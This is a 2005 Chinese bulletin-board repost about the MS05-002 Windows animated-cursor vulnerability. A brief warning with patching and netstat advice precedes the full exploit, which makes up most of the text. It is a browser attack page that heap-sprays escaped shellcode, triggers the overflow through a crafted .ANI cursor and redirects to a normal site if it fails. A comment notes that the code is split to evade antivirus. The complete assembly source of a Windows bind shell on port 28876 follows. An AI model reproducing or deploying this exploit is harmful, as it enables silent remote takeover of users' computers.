[转载]针对微软1月12日发布漏洞的攻击脚本开始流传
发信人: business (帝国), 信区: hacker标 题: 针对微软1月12日发布漏洞的攻击脚本开始流传
发信站: 兵马俑BBS (Sat Jan 15 13:57:32 2005), 本站(bbs.xjtu.edu.cn)
1月14日针对微软MS05-002 Vulnerability in Cursor and Icon
Format Handling Could Allow Remote Code Execution (891711)漏洞的攻击脚本开始
流传。
该脚本能够在用户浏览某个特定的网页的时候,在用户不知情的情况下,
利用该漏洞,在用户主机上进行缓冲区溢出攻击。一旦攻击成功,会执行特定的shellcode,
开辟28876端口,并绑定一个shell,即cmd,提供给攻击者进行远程连接,从而控制用户
主机,进行信息复制,删除等等操作,危害极大。
该脚本进行了巧妙伪装,一旦在用户的主机上攻击失败,
将自动跳转到攻击者指定的某个网页,即让用户看到正常的网页,感觉不到被攻击过。
建议大家尽快打补丁,并在注意升级病毒库,目前,我所发现的是kapsersky(卡巴斯基)
已经可以检查用户浏览的网页,一旦发现有该脚本,自动删除。
同时,在dos环境下,执行netstat -an ,检查28876端口是否被打开,或者其他异常
端口被打开。一旦发现被打开,请立刻切断网线。使用U盘copy补丁到受害机上,
或者立刻杀毒。
以上仅是个人分析,如有不当欢迎交流。
以下是该脚本和shellcode:
<HTML><!--
____________________________________________________________________________
____
,sSSSs, Ss, Internet Exploiter 3 v0.2
SS" `YS' '*Ss. .ANI stackoverflow PoC exploit
iS' ,SS" Copyright (C) 2003, 2004 by Berend-Jan Wever.
YS, .ss ,sY" [url]http://www.edup.tudelft.nl/~bjwever[/url]
`"YSSP" sSS <[email]skylined@edup.tudelft.nl[/email]>
____________________________________________________________________________
____
Credit for the vulnerability:
Yuji Ukai for eEye Digital Security
Patch:
[url]http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx[/url]
Changelog for 3.2:
- Putting the .ANI file in the HEAD sometimes caused the BoF to trigger
before the heap was prepared, fixed that by putting it in the BODY.
- New .ANI file overwrites the stack with a lot of 0x0D bytes, making su
re
it overwrites the return-address no matter where it is on the stack.
This makes it OS/SP/language independ, thanks to spoonm for the detail
s
on the .ANI file format.
This program is free software; you can redistribute it and/or modify it un
der
the terms of the GNU General Public License version 2, 1991 as published b
y
the Free Software Foundation.
This program is distributed in the hope that it will be useful, but WITHOU
T
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITN
ESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
A copy of the GNU General Public License can be found at:
[url]http://www.gnu.org/licenses/gpl.html[/url]
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA 02111-1307
USA.
-->
<SCRIPT language="javascript">
// Win32 MSIE exploit helper script, creates a lot of nopslides to l
and in
// and/or use as return address. Thanks to blazde for feedback and i
dears.
// 4 nops because the 0x0D slide has 5 byte instructions.
shellcode = unescape("%u3737%u3737" +
// Win32 bindshell (port 28876, '\0' free, looping). Thanks to
// HDM and others for inspiration and borrowed code. Source:
// [url]www.edup.tudelft.nl/~bjwever/shellcode/w32_bind_0free_loop.c[/url]
// (Added the "+"-s to fool Norton AV, it would see the
// shellcode as InternetExploiter 1)
"%u43eb"+"%u5756"+"%u458b"+"%u8b3c"+"%u0554"+"%u0178"+"%u52ea" +
"%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf" +
"%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b" +
"%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64" +
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850" +
"%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff" +
"%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22" +
"%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6" +
"%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe" +
"%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031" +
"%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56" +
"%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964" +
"%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353" +
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343" +
"%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031" +
"%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b" +
"%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
// Nopslide will contain these bytes:
bigblock = unescape("%u0D0D%u0D0D");
// Heap blocks in IE have 20 dwords as header
headersize = 20;
// This is all very 1337 code to create a nopslide that will fit exa
ctly
// between the the header and the shellcode in the heap blocks we wa
nt.
// The heap blocks are 0x40000 dwords big, I can't be arsed to write
good
// documentation for this.
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock
;
// And now we can create the heap blocks, we'll create 700 of them t
o spray
// enough memory to be sure enough that we've got one at 0x0D0D0D0D
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;
function failed() {
// You can't lose with this exploit.
document.location.href="[url]http://www.margrieta.com[/url]";
}
</SCRIPT>
<BODY style="CURSOR: url('InternetExploiter3.2.ani')" onload="setTimeout
(failed, 1000);">
</BODY>
</HTML>
以下是shellcode:
int main(void) {
__asm__("
#// output the code to stdout
mov $end-start, %edx #// length
mov $start, %ecx #// source
mov $0x1, %ebx #// stdout
mov $0x4, %eax #// write
int $0x80
jmp end
start:
jmp SkipProcedure
#//Search Procedure with hash %ebx in module %ebp, then jmp to it.
GetProcAddressAndRun:
push %esi
push %edi
mov 0x3c(%ebp), %eax #// eax = PE header offset
mov 0x78(%ebp,%eax), %edx #// edx = exports directory table offset
add %ebp, %edx #// edx = exports directory table address
push %edx
mov 0x20(%edx), %edx #// edx = name pointers table offset
add %ebp, %edx #// edx = name pointers table address
#// Check all names of procedures for the right hash
xor %eax, %eax
xor %ecx, %ecx
ScanProcedureNamesLoop:
inc %ecx
mov (%edx, %ecx, 4), %esi #// esi = name pointer offset
add %ebp, %esi #// esi = name pointer address
xor %edi, %edi
CalculateHashLoop:
ror $0x13, %edi
lodsb
add %eax, %edi
test %eax, %eax
jnz CalculateHashLoop
cmp %ebx, %edi #// check computed hash
jnz ScanProcedureNamesLoop
#// Found, get the address from the table
pop %edx
mov 0x24(%edx), %ebx #// ebx = ordinals table RNA offset
add %ebp, %ebx #// ebx = ordinals table RNA address
mov (%ebx, %ecx, 2), %cx #// ecx = function ordinal
mov 0x1c(%edx), %ebx #// ebx = address table RVA offset
add %ebp, %ebx #// ebx = address table RVA address
mov (%ebx, %ecx, 4), %eax #// eax = address of function RVA offset
add %ebp, %eax #// eax = address of function RVA address
pop %edi
pop %esi
jmp *%eax
#// %edi = LoadLibraryA address
SkipProcedure:
cld
#// Get Kernel32.dll baseaddress in %ebp
xor %eax, %eax
mov %fs:0x30(%eax), %eax #// PEB
#// kernel32.dll is blink in flink of InInitOrder module list
mov 0x0C(%eax), %eax #// PROCESS_MODULE_INFO
mov 0x1C(%eax), %esi #// InInitOrder.flink
lodsl #// eax = InInitOrder.blink
mov 0x08(%eax), %ebp #// ebp = kernel32.dll base address
kernel32BaseDone:
#// LoadLibraryA('ws2_32.dll')
xor %eax, %eax
mov $0x6c6c, %ax
push %eax #//'ll/0/0'
push $0x642e3233 #//'32.d'
push $0x5f327377 #//'ws2_'
push %esp
mov $0xfee8a771, %ebx #// hash LoadLibraryA
call GetProcAddressAndRun
mov %ebp, %edi #// edi = kernel32.dll baseaddress
mov %eax, %ebp #// use ws2_32.dll
#// WSAStartup(0x101, WSADATA)
add $-0x190, %esp
push %esp
xor %eax, %eax
inc %ah
inc %eax
push %eax #// 0x101
mov $0x7dab7d22, %ebx #// hash WSAStartup
call GetProcAddressAndRun
#//serversocket=WSASocketA(af=2, type=1, protocol=0, 0, 0, 0)
xor %eax, %eax
push %eax
push %eax
push %eax
push %eax
inc %eax
push %eax
inc %eax
push %eax
mov $0x793455a6, %ebx #//hash socket
call GetProcAddressAndRun
mov %eax, %esi #// esi = serversocket
#//create struct sockaddr {server_handle=2, port=28876, 0, 0}
xor %eax, %eax
push %eax
push %eax
xor $0xcc700102, %eax
dec %ah
push %eax
mov %esp, %eax #// eax = &sockaddr
push %eax #// > &sockaddr
#//bind(serversocket, &sockaddr, 0x10)
push $0x10
push %eax
push %esi
mov $0xbe2cb481, %ebx #// hash bind
call GetProcAddressAndRun
#//listen(serversocket, 0)
xor %eax, %eax
push %eax
push %esi
mov $0x9b58fad3, %ebx #// hash listen
call GetProcAddressAndRun
pop %eax #// < &sockaddr
mainloop:
pushA
#//clientsocket=accept(serversocket, &sockaddr, &0x10)
push $0x10
push %esp
push %eax
push %esi
mov $0xc656f347, %ebx #// hash accept
call GetProcAddressAndRun
mov %eax, %esi #// %esi = clientsocket
#//Create 'cmd' string on the stack
xor %ebx, %ebx
push %ebx
push $0x646D632e #// '.cmd'
mov %esp, %ecx #// %ecx -> 'cmd'
inc %ecx
xor %ebx, %ebx
#//Create struct STARTUPINFO
# [url]http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/b[/url]
ase/startupinfo_str.asp
push %esi #// si.stderr = clientsocket
push %esi #// si.stdout = clientsocket
push %esi #// si.stdin = clientsocket
push %ebx #// si.lpReserved2
push %ebx #// si.cbReserved2+si.wShowWindow
xor %eax, %eax
inc %ah #// si.dwFlags = STARTF_USESTD_HANDLES &
&
inc %eax #// STARTF_USESHOWWINDOW
push %eax
push %ebx #// si.dwFillAttribute
push %ebx #// si.dwYCountChars
push %ebx #// si.dwXCountChars
push %ebx #// si.dwYSize
push %ebx #// si.dwXSize
push %ebx #// si.dwY
push %ebx #// si.dwX
push %ebx #// si.lpTitle
push %ebx #// si.lpDesktop
push %ebx #// si.lpReserved
push $0x44 #// si.cb = sizeof(si)
mov %esp, %eax #// %eax -> si
#//Create struct PROCESS_INFORMATION
# [url]http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/b[/url]
ase/process_information_str.asp
push %ebx #// pi.dwThreadId
push %ebx #// pi.dwProcessId
push %ebx #// pi.hTread
push %ebx #// pi.hProcess
#//CreateProcessA(0, 'cmd', 0, 0, 1, 0, 0, 0, si, pi);
#[url]http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/ba[/url]
se/creating_a_child_process_with_redirected_input_and_output.asp
push %esp #// -> pi
push %eax #// -> si
push %ebx #// use parent's current directory
push %ebx #// use parent's environment
push %ebx #// creation flags
inc %ebx
push %ebx #// inherit handles (true)
dec %ebx
push %ebx #// primary thread security attributes
push %ebx #// process security attributes
push %ecx #// -> 'cmd'
push %ebx #// NULL
xchg %edi, %ebp #// use kernel32.dll
mov $0xd005d021, %ebx #// hash CreateProcessA
call GetProcAddressAndRun
#// WaitForSingleObject(ProcessHandle, -1);
#[url]http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/ba[/url]
se/waitforsingleobject.asp
#// %esp points to pi.hProcess so we just need to supply the -1.
pop %ebx #// pi.hProcess
xor %eax, %eax
dec %eax
push %eax #// -1 INFINITE
push %ebx #// pi.hProcess
mov $0x5f8dcb43, %ebx #// hash WaitForSingleObject
call GetProcAddressAndRun
#// closesocket(socket handle);
#// %esp points to the information we saved -8, two pops will take care of t
hat
push %esi
xchg %ebp, %edi
mov $0xd06d6b12, %ebx #// hash closesocket
call GetProcAddressAndRun
#// restore stack and registers and loop.
add $0x5C, %esp
popA
jmp mainloop
#///////////////////////////////////////////////
end:
");
exit(0);
}
页:
[1]